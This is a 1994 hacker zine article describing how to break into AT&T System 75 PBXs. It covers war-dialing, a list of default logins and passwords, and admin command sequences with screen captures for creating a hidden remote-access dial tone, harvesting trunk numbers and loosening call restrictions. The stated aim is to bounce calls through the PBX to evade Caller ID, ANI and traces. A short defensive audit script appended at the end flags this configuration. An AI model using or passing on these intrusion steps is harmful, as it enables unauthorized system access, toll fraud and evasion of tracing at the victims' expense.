                       Xenon Foundation presents:
                            the [X] files
                        Spring/1994  Issue: 15

                  "Stealth in Diverting - PBX Style"
                           By: Erik Turbo

Disclaimer: The information provided below is solely for the purpose of
diverting yourself from possible traces, ANI, and Caller ID. It is *not* to
be used for long distance toll fraud, including abusing 900 services, using
illicit calling cards, or other forms of credit card fraud.

Introduction
~~~~~~~~~~~~

A PBX, or Private Branch eXchange, is an on-premise facility, owned or leased
by an organization, which interconnects the telephones within the facility and
provides access to the public telephone system. Basically, it is a
mini-switching station: it allows a telephone user on the premises to dial a
three to four digit number (extension) to call another telephone on the
premises, and to dial one digit (usually 8 or 9) to get a dial tone for an
"outside line," which allows the caller to dial out to the rest of the public
telephone network.

This is the most important feature for a hacker who desires the stealth that
is necessary to continue his explorations. In short, you can remain well
hidden if you use a PBX's outside lines to connect to the computer you are
hacking. That way, any Caller ID, ANI, or trace will reach the PBX number, not
your home telephone. When you have mastered the art of PBX hacking, you should
make a habit of diverting with 3 or 4 "well spaced" PBXs before hitting your
target destination. For the advanced hacker, diverting with PBXs is just the
beginning of his actual diversion; it is best to bury yourself in
packet-switched networks, loop in and out of Internet hosts, bounce yourself
off of satellites with International calling, and utilize all of the
data-based outdials that you have.
Remember, abusing these PBXs for unnecessary long distance calling is NOT
condoned by me, or any members of the Xenon Foundation; it will kill the PBX
quicker, and place you at risk of serious fraudulent charges.

Definity G Model System 75
~~~~~~~~~~~~~~~~~~~~~~~~~~

Definity model System 75 systems control a large number of medium-sized
(approx. 1000 lines) PBXs. It is owned by AT&T, and was developed in the late
1970's, with modifications in 1983 and 1986. The actual System 75 machine has
one or more incoming 1200bps data lines, which connect at 7E1. It is through
this remote port that you may begin your actual hacking of the PBX. Since all
of the changes you make via modem affect the entire telephone network on the
PBX, this is a power that you will have to learn how to abstain from abusing.
It is possible to turn the once smoothly operating phone system into a chaotic
mass of busy signals, re-routes, Voice Mail Boxes, tones, and bridges,
effectively shutting down the victim for hours, if not days. For this reason,
I will only inform readers on how to create a remote extension for diverting
purposes.

Connection
~~~~~~~~~~

The best way to find a System 75 is to scan ("wargame dial") your local
telephone exchanges. There are still dozens of them around, and you are bound
to hit at least one in a few days of scanning. Upon connection you will see
the System 75 login and authorization prompts:

    Login: xxx
    Password: xxx

    INCORRECT LOGIN

You will be given three chances to guess the authorization password before the
system will drop carrier. On telephone systems that provide Caller ID
services, I would be wary; it is quite possible the System 75 dialup as well
as the PBX are equipped with ANI for auditing purposes.

Default Accounts and Passwords
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

With every new System 75 package, AT&T includes a large number of accounts and
passwords already installed and ready for usage. Usually, these passwords are
never changed by the owners.
Here is a listing of the known System 75 default accounts and passwords that
are included in every Definity G package:

    Login: enquiry      Password: enquirypw
    Login: init         Password: initpw
    Login: browse       Password: looker
    Login: maint        Password: rwmaint
    Login: locate       Password: locatepw
    Login: rcust        Password: rcustpw
    Login: tech         Password: field
    Login: cust         Password: custpw
    Login: inads        Password: inads
    Login: support      Password: supportpw
    Login: bcim         Password: bcimpw
    Login: bcnas        Password: bcnspw
    Login: craft        Password: craftpw

Note: The browse account can *not* modify anything on the System 75. It is
only useful for examining the possibility of an existing remote extension, not
for the actual creation of one.

Internal System 75 Commands
~~~~~~~~~~~~~~~~~~~~~~~~~~~

If those defaults did not work, the only other alternatives are social
engineering and brute force hacking. Neither is likely to work unless you are
a social engineering master, or have time to waste brute force hacking. Your
best bet is to move on and hope to scan a less protected System 75.

Assuming you have passed the authorization, you will be prompted with the
following:

    Terminal Type (513, 4410, 4425): [513]

These are the basic System 75 remote usage emulation codes. I prefer to use
4410, as it appears much "cleaner" on a VT100 IBM PC. The emulation is used
to remotely send System 75 key sequences: to request help, to save a session,
to move forward a page, to move back a page, etc. Since the IBM keyboard has
no way to emulate these keys, the System 75 provides 3 basic emulation codes.
For our purposes, use 4410. The following sequences will work with emulation
4410:

    ESC Op - To cancel a command
    ESC Ot - To request Help
    ESC Ov - Next Page
    ESC Ow - Previous Page
    ESC Or - Save
    ESC Oq - Refresh Screen
    ESC Os - Clear Fields

You can achieve the escape sequences by hitting the ESC key, and then the key
combination O and the following character.
Once you have chosen emulation 4410, please remember (or take note of) the
previous escape sequences. You will not be able to save information without
knowing the proper code ("ESC Or"). ESC Op is also very important since it is
the only method of stopping the execution of a command; something you will
have to do constantly when looking over certain pieces of information within
the System 75. Take these down!

Next you will see the AT&T banner and the command prompt:

    Copyright (c) 1986 - AT&T
    Unpublished & Not for Publication
    All Rights Reserved

    enter command:

There is online help available at all times by pressing "ESC Ot", as well as
keying 'help' at the command prompt. Familiarize yourself with the system. It
is basically cryptic, as it is usually only used by experienced AT&T
technicians.

Examining the PBX
~~~~~~~~~~~~~~~~~

Once you are in, you now want to get to working on your diverter. What you
will obviously need is an extension dedicated explicitly to a dial tone on the
outside network. To accomplish this quickly and easily, all you must do is
type "change remote" at the command prompt. This will bring you to the
following screen:

    change remote-access                                     Page 1 of 1
                                  REMOTE ACCESS

         Remote Access Extension:            Barrier Code Length:

         BARRIER CODE ASSIGNMENTS (Enter up to 10)
               Barrier Code  COR             Barrier Code  COR
           1:                 1          6:                 1
           2:                 1          7:                 1
           3:                 1          8:                 1
           4:                 1          9:                 1
           5:                 1         10:                 1

As you can see, there is no remote access extension set up, therefore this
PBX does not have any existing dialtones available. Now to create one, type in
the extension you wish to direct you to your dialtone. The extension you type
in should be a 4 digit number, starting with "2" or "4", as these are valid
extensions under System 75 software. When you type in your extension, press
enter; if it gives you an error, try a different extension until it accepts
your input. If you wish to add a security code on your dialtone, you may enter
its length at the "Barrier Code Length:" prompt.
Under the heading "Barrier Code", at the "1:" prompt, type in your desired
security code. After you are all set, the screen should look something like
this:

    change remote-access                                     Page 1 of 1
                                  REMOTE ACCESS

         Remote Access Extension: 2400       Barrier Code Length: 6

         BARRIER CODE ASSIGNMENTS (Enter up to 10)
               Barrier Code  COR             Barrier Code  COR
           1:  222222         1          6:                 1
           2:                 1          7:                 1
           3:                 1          8:                 1
           4:                 1          9:                 1
           5:                 1         10:                 1

Now you have a working extension that is not only available for your use in
diverting, but also secure from others who do not know your barrier code. Type
the key combination "ESC Or" to save your work.

Finding the PBX Dialup
~~~~~~~~~~~~~~~~~~~~~~

Now that you are guaranteed a tone, you must find out the telephone number the
PBX is located at. Type "list trunk-group" at the command prompt. It should
give you a listing similar to this:

    Group                                   No. of              Outgoing
    Number  TAC  Group Type  Group Name     Members  COR  SMDR?  Display?
         1  801  co          Incoming            12    1  y      n
         2  851  co          Sales Room           1    1  y      n
         9  809  co          Billing              4    1  y      n
        10  810  co          Admin line           1   63  y      n

    Command successfully completed
    CANCEL P    HELP T

Now that you have a listing of all the trunk groups that are present on the
PBX, you can individually list them to get their corresponding telephone
numbers. Type "display trunk-group 1" to display trunk group 1 (Group Number
1, Group Name "Incoming"). As you can see from the above capture, there are 4
trunk groups available: 1, 2, 9, and 10. Display each of them, and use the
'next page' ("ESC Ov") key combination to get to the page (usually page 2 or
3) with the telephone numbers of the trunk. Each time you display a trunk
group, you will get a screen similar to the following:

    display trunk-group 1                                    Page 1 of 5
                                   TRUNK GROUP

    Group Number: 1                  Group Type: co         SMDR Reports? y
      Group Name: Incoming                  COR: 1                  TAC: 801
       Direction: two-way      Outgoing Display? n      Data Restriction? n
    Dial Access? y           Busy Threshold: 60           Night Service:
    Queue Length: 0
    Incoming Destination: 200          Comm Type: voice
    Digit Absorption List:             Prefix-1? n         Restriction: toll
    Allowed Calls List? n

    TRUNK PARAMETERS
      Trunk Type: loop-start      Outgoing Dial Type: tone
      Trunk Termination: rc       Disconnect Timing(msec): 500
      ACA Assignment? n           Maintenance Tests? y
      Answer Supervision Timeout: Suppress # Outpulsing? n
_____________________________________________________________________________

To get the actual dialups, you must look on the following pages. The "ESC Ov"
combination will do that under emulation 4410:

_____________________________________________________________________________
    display trunk-group 1                                    Page 2 of 5
                                   TRUNK GROUP

                           GROUP MEMBER ASSIGNMENTS
          Port    Name       Mode    Type    Answer Delay
      1:  A0101   555-2322
      2:  A0102   555-2342
      3:  A0103   555-2343
      4:  A0104   555-2345
      5:  A0105   555-2456
      6:  A0106   555-2457
      7:  A0107   555-2458
      8:  A0108   555-2459
      9:  A0201   555-2460
     10:  A0202   555-2461
     11:  A0203   555-2462
     12:  A0204   555-2470
     13:  A0205   555-2800
     14:  A0206   555-2810
     15:  A0207   555-2811

Make a note of the telephone numbers on the trunks, and dial them up after
logging off the System 75. When you dial them up voice, if one of them prompts
you for an extension, type in the remote extension you created earlier. You
should hear the tone of an outside line. If you created the remote extension
with a barrier code, touch-tone that in now. Next, dial "9" to get an outside
line (it can also be "8" on some systems), and then dial the telephone number
you want to reach, just as you normally would from your home telephone.

Tricks and Hints
~~~~~~~~~~~~~~~~

The following are methods and commands that can be used in addition to the
above mentioned hacking tactics. They are not necessary to the smooth creation
of a remote dialtone off of a PBX, however.

When you are displaying the trunk groups individually, look under the heading
"Direction:" (found on page 1). If it says "one-way", then modify that (with
the "change trunk #" command) to say "two-way".
Also on page 1, change the "Incoming Destination:" header to reflect the
remote access extension that you created earlier. On the next page, get the
dialups. You have just created a large set of tones. Since they used to be
"one-way", only users within the building could use them to dial out, but
since you have changed it to "two-way", and changed the incoming destination
extension to your remote extension, you are allowing incoming callers to use
the tone service as well.

If you do not want to arouse suspicion, instead of changing the "Incoming
Destination:" to your extension, just change the "Night Service:" header to
your remote extension. With this, however, you can only use the tone service
after hours; usually after the business closes.

To get an idea of how the extensions are uniformly placed on the PBX, type
"display dialplan" at the command prompt. This will give you all the prefixes
of the three or four digit extensions. This is valuable if you are having
trouble finding a valid extension to use for your remote extension.

When displaying a trunk group, mark down the COR (Class of Restriction)
number. Type "display COR #" (where # is the COR number of a specific trunk).
Make sure the FRL prompt is set to 7, and the calling restrictions are set to
"none". If not, type "change cor (COR #)", and make the necessary
modifications.

Type "display feature" to get a listing of all the feature access codes on
the system. This is valuable if you can not get an outside line by dialing
"9" or "8". The dialout access code will be in here.

Conclusion
~~~~~~~~~~~

Basically, it is extremely simple to create a remote extension off of a PBX
in your local area. If you use the PBX just to make local calls and to divert
yourself further through the telephone network, it should last a rather long
time.
However, if you abuse it by dialing Alliance Teleconferences every night, or
to call your friend in the UK three times a day, it will either die, or get
slapped with ANI.

I have tried to be as straightforward as possible, without having to
technically explain every detail of operation. Once you get the hang of it,
you should be able to create your remote extensions in under 10 minutes.
However, if you are having problems, you can contact me at the following
locations:

    Internet Mail:      erikt@xf.com
    Void of Deception:  [508]/998-2400

Additional Reading:
~~~~~~~~~~~~~~~~~~~

    Hacking AT&T System 75, Scott Simpson, Phrack 41, File 6.
    System 75 Hacking (An Online Tutorial), Panther Modern, COTNO01.TXT,
        File 3.
    Data and Computer Communications, William Stallings, Macmillan
        Publishing Co.
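As an added example that is not part of the original article: a PBX administrator's audit script that reads the "change remote-access" screen and page 1 of each "display trunk-group" screen in the layout the article shows, and flags the configuration the article walks through (a remote access extension being set, a barrier code that is short, all one digit or sequential, and trunk groups whose "Incoming Destination:" or "Night Service:" routes to that extension). The screen captures are constructed for the example, and the field regex and the barrier-code weakness rules are my assumptions, not System 75 features.

```python
import re

# Constructed System 75 screens in the layout the article shows (not real captures).
# Group 1's Night Service and group 10's Incoming Destination point at the remote
# access extension, the two re-routes the Tricks and Hints section describes.
REMOTE_ACCESS = """\
change remote-access                                   Page 1 of 1
    Remote Access Extension: 2400        Barrier Code Length: 6
          Barrier Code  COR          Barrier Code  COR
     1:   222222         1      6:                  1
"""
TRUNKS = ["""\
display trunk-group 1                                  Page 1 of 5
Group Number: 1             Group Type: co          SMDR Reports? y
Night Service: 2400         Queue Length: 0
Incoming Destination: 200      Comm Type: voice
""", """\
display trunk-group 10                                 Page 1 of 5
Group Number: 10            Group Type: co          SMDR Reports? y
Night Service:              Queue Length: 0
Incoming Destination: 2400     Comm Type: voice
"""]

def field(screen, label):
    """Value printed after 'label: ', or '' when the field is blank (assumed layout:
    a value ends at the two-space gap before the next label or at end of line)."""
    m = re.search(re.escape(label) + r": ?(\S[^\n]*?)(?=\s{2,}|\n|$)", screen)
    return m.group(1) if m else ""

def weak_barrier(code):
    """Assumed policy: short, single-digit or sequential codes give little protection."""
    steps = {int(b) - int(a) for a, b in zip(code, code[1:])}
    return len(code) < 6 or steps in ({0}, {1}, {-1})

def audit(remote_screen, trunk_screens):
    """Findings an administrator should review, in screen order."""
    findings = []
    ext = field(remote_screen, "Remote Access Extension")
    if not ext:
        return findings                      # no remote access extension: nothing exposed
    findings.append(f"remote access enabled on extension {ext}")
    codes = re.findall(r"\b(?:[1-9]|10):\s+(\d{3,})", remote_screen)  # "1:   222222"
    if not codes:
        findings.append("remote access has no barrier code")
    findings += [f"weak barrier code {c}" for c in codes if weak_barrier(c)]
    for s in trunk_screens:                  # page 1 of each display trunk-group
        g = field(s, "Group Number")
        for label in ("Incoming Destination", "Night Service"):
            if field(s, label) == ext:
                findings.append(f"trunk group {g}: {label} routes to {ext}")
    return findings
```

Run `audit(REMOTE_ACCESS, TRUNKS)` against captures of your own PBX screens to get a list of findings; an empty list means no remote access extension is configured.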